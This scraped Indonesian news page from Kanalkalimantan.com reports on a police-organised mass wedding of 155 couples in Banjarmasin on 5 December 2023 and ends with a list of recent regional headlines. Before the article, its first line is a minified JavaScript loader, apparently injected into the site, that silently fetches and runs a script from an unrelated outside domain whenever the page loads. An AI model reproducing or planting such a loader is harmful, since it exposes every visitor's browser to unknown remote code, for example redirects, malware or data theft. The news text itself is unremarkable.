(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Besok, 155 Pasangan Nikah Massal di Siring Balai Kota Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Setelah sempat tertunda, pelaksanaan program nikah massal “Presisi Baiman Adalah Kita'” di Kota Banjarmasin dipastikan terlaksana awal Desember.

Kapolresta Banjarmasin, Kombes Pol Sabana Atmojo memastikan nikah massal akan digelar Selasa (5/12/2023) berlokasi di kawasan Siring Balai Kota Banjarmasin, Jalan RE Martadinata.

“Nikah massal yang kami laksanakan bekerjasama dengan stakeholder dengan pasti dilaksanakan hari Selasa 5 Desember 2023,” katanya, Minggu (3/12/2023) siang.

Kegiatan tersebut, kata Sabana, akan diikuti sebanyak 155 pasangan yang sebelumnya sudah melakukan pendaftaran. Mereka terdiri 52 pasangan nikah KUA, sedangkan sisanya 103 pasangan merupakan sidang itsbat nikah.

Baca juga: Tangis dan Takbir dalam Aksi Bela Palestina di Lapangan Murdjani

“Dari 300 lebih orang mendaftar, yang masuk kategori bisa diikutkan nikah massal hanya setengahnya saja,” ujarnya.

Bagi peserta yang sudah mendaftar dan tidak lulus verifikasi, Kapolresta Banjarmasin mengatakan jangan berkecil hati. Sebab pihaknya berencana akan menggelar kegiatan nikah massal berikutnya di tahap kedua.

Sebelumnya, kegiatan nikah massal sempat tertunda beberapa kali lantaran terdapat sejumlah kendala. Awalnya nikah massal direncanakan pada 12 November 2023, kemudian dijadwalkan kembali 15 November 2023. Hingga pada akhirnya diputuskan di awal Desember 2023.

Baca juga: DPPPA HSU Bekali Remaja Bimbingan Kesehatan Mental dan Kesadaran Bermedsos

Salah satu kendalanya dikatakan lantaran terdapat peserta yang tidak memiliki akta dan sudah beberapa kali menikah, sehingga sempat terjadi permasalahan administrasi atau gagal saat verifikasi di KUA dan Kemenag.

“Mudah-mudahan nanti kegiatan bisa berjalan lancar,” harapnya.

Selain nikah massal, kegiatan tersebut dikatakan Kapolresta juga dirangkai dengan pasar murah, bazar UMKM, doorprize, dan pembagian sembako untuk masyarakat tidak mampu.

Kegiatan tersebut menurutnya adalah wujud kepedulian negara dalam hal ini Polda Kalsel, Polresta Banjarmasin, dan Pemko Banjarmasin kepada masyarakat khususnya yang ada di Kota Banjarmasin.

Baca juga: Dari Bandung Mencari Nafkah dan Berkah Aksi Bela Palestina di Banjarbaru

“Diantaranya membantu masyarakat yang sebelumnya sudah menikah namun tidak dicatatkan resmi di lembar negara, lalu menjadi resmi tanpa memungut biaya,” tandasnya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

3 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

5 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

8 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

8 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

10 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

11 jam ago

This website uses cookies.